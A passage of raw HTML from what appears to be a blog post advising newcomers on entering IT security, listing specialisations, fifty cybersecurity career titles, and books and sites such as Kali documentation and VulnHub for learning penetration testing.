background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Now you have at least 6 months of studying ahead, and you can find more related training. Remember, Google is your friend.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>I ALREADY HAVE THE SKILLS (Really? Double check it)</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>So, if you already have the required skills, there are some excellent references that you can use to get into IT security. Still, first, you should select one area and move to another one after you have mastered it (my recommendation). However, sometimes you have to mix them to get better results. Some security areas (it's not an exhaustive list):</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Web Pentesting</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Network Pentesting</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Mobile Pentesting</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>SCADA Pentesting</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Reverse Engineering</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Malware Analysis</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Forensics</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Security Research</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Hardware Security</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Exploitation</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Hardware Hacking</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>IoT Pentesting</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>RedTeaming -> Offensive</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>BlueTeam -> Defensive</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Of course, you can simultaneously share your focus and study more than 1 topic.<br /><br />If you are still lost, here there some careers you can search for and decide what is more suitable for you:<br /> <br /></span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">1. Application Security Administrator – Keep software/apps safe and secure.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">2. Artificial Intelligence Security Specialist – Use AI to combat cybercrime.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">3. Automotive Security Engineer – Protect cars from cyber intrusions.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">4. Blockchain Developer / Engineer – Code the future of secure transactions.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">5. Blue Team Member – Design defensive measures / harden operating systems.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">6. Bug Bounty Hunter – Freelance hackers find defects and exploits in code.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">7. Cybersecurity Scrum Master – Watch over and protect all data.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">8. Chief Information Security Officer (CISO) – Head honcho of cybersecurity.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">9. Chief Security Officer (CSO) – Head up all physical/info/cyber security.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">10. Cloud Security Architect – Secure apps and data in the cloud.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">11. Counterespionage analyst – Thwart cyber spies from hostile nation states.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">12. Cryptanalyst – Decipher coded messages without a cryptographic key.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">13. Cryptographer – Develop systems to encrypt sensitive information.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">14. Cyber Insurance Policy Specialist – Consult on cyber risk and liability protection.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">15. Cyber Intelligence Specialist – Analyze cyber threats and defend against them.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">16. Cyber Operations Specialist – Conduct offensive cyberspace operations.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">17. Cybercrime Investigator – Solve crimes conducted in cyberspace.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">18. Cybersecurity Hardware Engineer – Develop security for computer hardware.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">19. Cybersecurity Lawyer – Attorney focused on info/cyber security and cybercrime.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">20. Cybersecurity Software Developer / Engineer – Bake security into applications.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">21. Data Privacy Officer – Ensure legal compliance related to data protection.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">22. Data Recovery Specialist – Recover hacked data from digital devices.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">23. Data Security Analyst – Protect information on computers and networks.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">24. Digital Forensics Analyst – Examine data containing evidence of cybercrimes.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">25. Disaster Recovery Specialist – Plan for and respond to data and system catastrophes.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">26. Ethical / White Hat Hacker – Perform lawful security testing and evaluation.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">27. Governance Compliance & Risk (GRC) Manager – Oversee risk management.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">28. IIoT (Industrial Internet of Things) Security Specialist – Protect industrial control systems.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">29. Incident Responder – First response to cyber intrusions and data breaches.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">30. Information Assurance Analyst – Identify risks to information systems.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">31. Information Security Analyst – Plan and carry out infosecurity measures.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">32. Information Security Manager / Director – Oversee an IT security team(s).</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">33. Intrusion Detection Analyst – Use security tools to find targeted attacks.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">34. IoT (Internet of Things) Security Specialist – Protect network connected devices.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">35. IT Security Architect – Implement network and computer security.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">36. Malware Analyst – Detect and remediate malicious software.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">37. Mobile Security Engineer – Implement security for mobile phones and devices.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">38. Network Security Administrator – Secure networks from internal and external threats.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">39. Penetration Tester (Pen-Tester) – Perform authorized and simulated cyberattacks.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">40. PKI (Public Key Infrastructure) Analyst – Manage the secure transfer of digital information.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">41. Red Team Member – Participate in real-world cyberattack simulations.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">42. SCADA (Supervisory control and data acquisition) Security Analyst – Secure critical infrastructures.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">43. Security Auditor – Conduct audits on an organization’s information systems.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">44. Security Awareness Training Specialist – Train employees on cyber threats.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">45. Security Operations Center (SOC) Analyst – Coordinate and report on cyber incidents.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">46. Security Operations Center (SOC) Manager – Oversee all SOC personnel.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">47. Source Code Auditor – Analyze software code to find bugs, defects, and breaches.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">48. Threat Hunter – Search networks to detect and isolate advanced threats.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">49. Virus Technician – Detect and remediate computer viruses and malware.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">50. Vulnerability Assessor – Find exploits in systems and applications.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br />In these links, you can find more detailed information regarding each carrier: </p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br />https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6b6beaf55a366a55/Poster_Coolest-Careers_v0322.pdf<br /><br />https://www.sans.org/cybersecurity-careers/20-coolest-cyber-security-careers/</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>If you are considering using Kali to start your studies, you should visit the link http://docs.kali.org.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>This link has a lot of Kali documentation that can help you before you go to the #kali-Linux channel on Freenode and ask an obvious question. Also, you can use forums.kali.org. Additionally, as Kali is Debian-based, it is good to check the Debian Linux documentation if you are unfamiliar with this distro.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Some helpful links to start your pentest journey:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Books:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.hackingexposed.com/ - Very nice book series that covers a lot of different topics.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>This is another very nice book series that covers many topics, like Mobile, Android, Cars, and others, not only Web Applications, search for it.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.amazon.com/s/ref=nb_sb_noss_1?url=search-alias%3Dstripbooks&field-keywords=hacker%27s+handbook&rh=n%3A283155%2Ck%3Ahacker%27s+handbook</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.amazon.com/SQL-Injection-Attacks-Defense-Second/dp/1597499633/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Red Teaming: </span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.amazon.de/Red-Team-Succeed-Thinking-Enemy/dp/0465048943</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.amazon.de/-/en/Joe-Vest/dp/B083XVG633/ref=pd_lpo_4?pd_rd_i=B083XVG633&psc=1</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Also, you can google "Pentest Kali Linux" on google. There are a lot of related books, just choose one and try.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Links:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>One more link in the same style as this post:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.corelan.be/index.php/2015/10/13/how-to-become-a-pentester/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.vulnhub.com - > A lots of vulnerable machines to play with.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: 